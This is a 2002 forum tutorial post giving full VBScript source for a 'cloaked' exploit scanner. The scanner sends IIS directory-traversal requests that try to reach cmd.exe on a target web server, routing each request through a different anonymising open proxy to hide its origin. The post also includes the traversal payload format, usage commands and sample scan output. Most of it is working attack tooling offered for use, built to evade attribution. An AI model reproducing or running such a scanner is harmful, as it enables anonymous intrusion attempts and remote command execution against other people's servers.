Cloaked Exploit Scanner II

**ntsa** · July 17th, 2002, 04:53 PM

Overview

This is a continuation of my article on writing a Cloaked expliot scanner. In the first part we created a file called 'livehosts' containing a list of responding anonising proxy servers. In this article we will look at how to rotate through this file, connecting to a target server via a different proxy server for every request we make.

If you have not already read parts I - IV of this set of articles on the tcpUtil code please refer to these threads first before attempting the following:
Part I of this document
Scripting Internet Connections Under Window$
Search Engine submission 'exploit'
Google 'exploit' - TCPUtil pt III

The Exploit File

Requests that are to be passed through the proxy to a server a listed in the 'exploit' file. A sample exploit file is included in the zip file at the end of this article, but you could stuff this file with just about anything. The file contains requests URLs that the script will try and GET on the traget machine via a proxy.

For example, the format of a simple traversal exploit would be as follows.

/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir+c:\

The script will try each request line in turn, cycling through the list of proxies in the live hosts file.

Usage

An example

scan -t www.ntsa.org.uk -e exploit -p livehosts -d 1

The command above scans www.ntsa.org.uk using the file exploit as the list of requests and livehost as the list of live anonising proxy servers. The command produces the output below. Notice that each request is made via a different proxy server. The Server response is the return code from the server. If the return code is 200 (sucsessful) then you have (in the examples) found a traversal to the command line.

--Cloaked Exploit Scanner.
--July 2002 by NTSA.
--www.ntsa.org.uk

exploit: HEAD http://www.ntsa.org.uk/.%2e/.%2e/win...exe?/c+dir+c:\
HTTP/1.0
Proxy: 207.2.54.2
Port: 80
Server Response> 403
exploit: HEAD http://www.ntsa.org.uk/..%2e..%2ewin...exe?/c+dir+c:\
HTTP/1.0
Proxy: 12.34.48.126
Port: 80
Server Response> 404
exploit: HEAD http://www.ntsa.org.uk/..%2f..%2f..%...tem32/cmd.exe?
/c+dir+c:\ HTTP/1.0
Proxy: 12.34.48.129
Port: 80
Server Response> 403
exploit: HEAD http://www.ntsa.org.uk/..%2f..%2fwin...exe?/c+dir+c:\
HTTP/1.0
Proxy: 66.64.3.154
Port: 80
Server Response> 403
exploit: HEAD http://www.ntsa.org.uk/..%5c..%5c..%...innt/system32/
cmd.exe?/c+dir+c:\ HTTP/1.0
Proxy: 208.144.37.7
Port: 80
Server Response> 403
exploit: HEAD http://www.ntsa.org.uk/..%5c..%5cwin...exe?/c+dir+c:\
HTTP/1.0
Proxy: 207.35.39.100
Port: 80
Server Response> 403
exploit: HEAD http://www.ntsa.org.uk/..%5c../..%5c.../system32/cmd.
exe?/c+dir+c:\ HTTP/1.0
Proxy: 204.60.171.225
Port: 80
Server Response> 403

Registration of the sbwinsock control

You need to register the sbwinsock.ocx control provided in the zip file at the of this post. To register the OCX component run the following command:

regsvr32 <path_to_OCX>\<component_name>.OCX

The Code!

Code:

dim buffer,blncon,blnSkip,wtresp,secwait,blnLastcmdnull 'Program Vars
DIM blnbuff,blnifile,lang,sdelay,Verbose,debug,iFile,Ofile,str,Target,exploitfile,proxyfile 'User Vars
Dim oArgs, ArgNum 'Argument vars

Const sckTCPProtocol=0 
Const sckUDPProtocol=1

const FlgDebug =1
const flgVerbose =2
const flgEcho =3

Const ForReading = 1
const ForWriting = 2

WScript.Echo "--Cloaked Traversal Scanner."
WScript.Echo "--July 2002 by NTSA."
WScript.Echo "--www.ntsa.org.uk"
WScript.Echo ""

'Create a FSO for file I/O operations
Set fso = CreateObject("Scripting.FileSystemObject")
'Create the winsock object and pass the event handler tp wsPop_
on error resume next
Set tcpClient=WScript.CreateObject("sbWinsck.winsock","wsPop_")
if err.number > 0 then 
out "Could not create an instance of the SBWinsck control.",flgEcho
out "You need to register SBWinsck.ocx using the regsvr32",flgEcho
out "command. (ie regsvr32 c:\path\sbWinsck.ocx where c:\path",flgEcho
out "is the full path to the ocx file.",flgEcho
end if


GetUserParams

sp = split (proxylist,"|")
proxycount = cint(sp(0))
proxy = split(sp(1),",")

ex = split (ExploitList,"|")
Exploitcount = cint(ex(0))
Exploit = split(ex(1),",")

px = 0

for n = 0 to Exploitcount -1

sp = split(proxy(px),":")
host = sp(0)
port = sp(1)

str = "HEAD " & lcase("http://" & target & exploit(n)) & " HTTP/1.0"

out "exploit: " & STR,flgecho
out "Proxy: " & host,flgecho
out "Port: " & port,flgecho

tcpClient.Protocol = sckTCPProtocol
tcpClient.RemoteHost = host 
tcpClient.RemotePort =  port

tcpClient.Connect

tio = 0
do until blncon = true or blnskip = true or tio = sdelay *2
WSCRIPT.SLEEP 250
out "Waiting for connection...",FlgDebug
tio = tio + 1
LOOP

fail = false
'Timed out - Could not connect
if tio = sdelay *2 and blnskip =false then 
out "Could not connect to: " & tcpClient.RemoteHost &_
" on port: " & tcpClient.RemotePort & ".",FlgEcho
fail = true
end if

if fail = false then

tio = 0
do until blncon = false or tio = sdelay *2
	WSCRIPT.SLEEP 500
	out "Waiting for disconnection...",FlgDebug
	tio = tio + 1
loop

'Output buffer to screen
out "Server Response> " & mid(buffer,10,3), Flgecho
	
end if

blncon = false
blnskip = false
buffer = ""

tcpclient.disconnect

px = px + 1
if px > proxycount -1 then px = 0	

Set tcpClient=nothing
Set tcpClient=WScript.CreateObject("sbWinsck.winsock","wsPop_")
next 

function ProxyList 

dim cnt
cnt = 0

Set livehosts = fso.OpenTextFile(proxyfile, ForReading)
do while trim(host) <> "."
host = livehosts.ReadLine
if len(trim(host)) > 0 and trim(host) <> "." then
	proxylist = proxylist & trim(host) & ","
	cnt = cnt + 1
end if
loop

proxylist = cstr(cnt) & "|" & left(proxylist,len(proxylist)-1)

end function

function ExploitList 

dim cnt
cnt = 0

Set file = fso.OpenTextFile(exploitfile, ForReading)

do while trim(host) <> "."
host = file.ReadLine
if len(trim(host)) > 0 and trim(host) <> "." then
	ExploitList = ExploitList & trim(host) & ","
	cnt = cnt + 1
end if
loop

ExploitList = cstr(cnt) & "|" & left(ExploitList,len(ExploitList)-1)

end function


Sub wsPop_DataArrival(Byval b)

dim strdata
out "Data Arrival...",flgverbose	
'/* Get the data and add it to the buffer...
'*/
tcpClient.GetData strData,vbstring

if blnbuff = true then
buffer = buffer &  strdata
else
out strdata,Flgverbose
end if

'Data has just arrived - wait some 
'more to see if anything further comes
secwait = 100
blnskip = true

end sub

Sub wsPop_Connected()

blncon = true
blnskip = true
out "Connected...",flgverbose
'sending data to the host
out "Sending data...",flgverbose

sendandlog str & vbcrlf

out "Data sent.",flgverbose

End Sub

sub sendandlog(data)

tcpclient.SendData data & vbCrLf
LogDataSend(data)

end sub


sub LogDataSend(poststr)

if port = 80 then
out "Sending:> " & poststr,Flgverbose
else 
'out "Sending:> " & poststr,FlgEcho
end if

end sub

Sub wsPop_Close()

blncon = false
out "Disconnected...",flgverbose

End Sub

function RemoveDel(str)

RemoveDel = replace(str,"/","")
RemoveDel = replace(RemoveDel,"-","")
RemoveDel = replace(RemoveDel,"--","")

end function

function IsEmpty(str)

if str & "" = "" then 
isempty = true
else
isempty = false
end if

end function

function iCount(str,del)

icount =0

for i = 1 to len(str)
if mid(str,i,1) = del then
	icount = icount +1
end if
next

icount = icount - 1

end function

function input(quest)

WScript.StdOut.Write(quest & ":>")
input = WScript.StdIn.ReadLine()

end function

sub out(str,flg)

select case flg
case flgEcho
	wscript.echo str
case flgVerbose
	if verbose = true or debug = true then
		wscript.echo str
	end if
case FlgDebug
	if debug = true then
		wscript.echo str
	end if
end select
end sub

sub GetUserParams

buffset = 0

Set oArgs = WScript.Arguments
ArgNum = 0
While ArgNum < oArgs.Count

Select Case RemoveDel(LCase(oArgs(ArgNum)))
	Case "explotfile","e":
		ArgNum = ArgNum + 1
		If (fso.FileExists(oArgs(ArgNum))) Then
			exploitfile = oArgs(ArgNum)
		else
			out "Error! The file " & oArgs(ArgNum) & _
			" was not found.",FlgEcho
			out "",FlgEcho
			displayusage
			wscript.quit(1)
		end if
	Case "proxyfile","p":
		ArgNum = ArgNum + 1
		If (fso.FileExists(oArgs(ArgNum))) Then
			proxyfile = oArgs(ArgNum)
		else
			out "Error! The file " & oArgs(ArgNum) & _
			" was not found.",FlgEcho
			out "",FlgEcho
			displayusage
			wscript.quit(1)
		end if
	Case "target","t":
		ArgNum = ArgNum + 1
		Target = oArgs(ArgNum)
	Case "delay","d":
		ArgNum = ArgNum + 1
		sdelay = oArgs(ArgNum)
	Case "help","?":
		Call DisplayUsage
	Case "verbose", "v":
		Verbose = true
	Case "debug","vv":
		debug = true
	Case Else:
		WScript.Echo "Unknown argument "& oArgs(ArgNum)
		Call DisplayUsage
		wscrip.quit(1)
End Select	

ArgNum = ArgNum + 1
Wend

blnbuff = true
buffset = 1

if isempty(sdelay) then
'Set default as 1 second delay before breaking connection
sdelay = 1
end if

if isempty(target) or isempty(exploitfile) or isempty(proxyfile) then
'Set default as 3 second delay before breaking connection
out "A target host, a proxy file and exploit file are required.",flgecho
DisplayUsage
wscript.quit(1)
else
out "target> " & target,flgdebug
out "exploitfile> " & exploitfile,flgdebug
out "proxyfile> " & proxyfile,flgdebug
end if

end sub

Sub DisplayUsage

WScript.Echo "Usage: scan.vbs [--Target|-t]"
WScript.Echo "        [--exploitfile|-e] file name to read exploit list from"
WScript.Echo "        [--proxyfile|-p] file name to read live proxies list from"
WScript.Echo "        [--Delay|-d] Page Time Out delay " & _ 
		   "(in seconds) Default: 1 Seconds"
WScript.Echo "        [--Verbose|-v]"
WScript.Echo "        [--debug|-vv]"
WScript.Echo "        [--Help|/?]>"
WScript.Echo ""
WScript.Quit (1)	

End Sub

If you enjoyed this thread you may enjoy these others:

Cloaked Exploit Scanner Part I and Part II
Google 'exploit' - TCPUtil pt III
Open Source FTP Control
Web based classes
Backing up the IIS metabase.
What port is that?
Building your own IDS tripwire.
Credit card security
Dumping SQL data to a text file
Hunting down skript kiddies
Search Engine submission 'exploit'
Forced shutdown of a remote nt/2k server
Securing an installation of IIS 4. (No, seriously)
Remote DSN Connections, using WinAPIs and the registry
Scripting Internet Connections Under Window$

Thread: Cloaked Exploit Scanner II

Thread Tools

Display

Threaded View

Cloaked Exploit Scanner II

Posting Permissions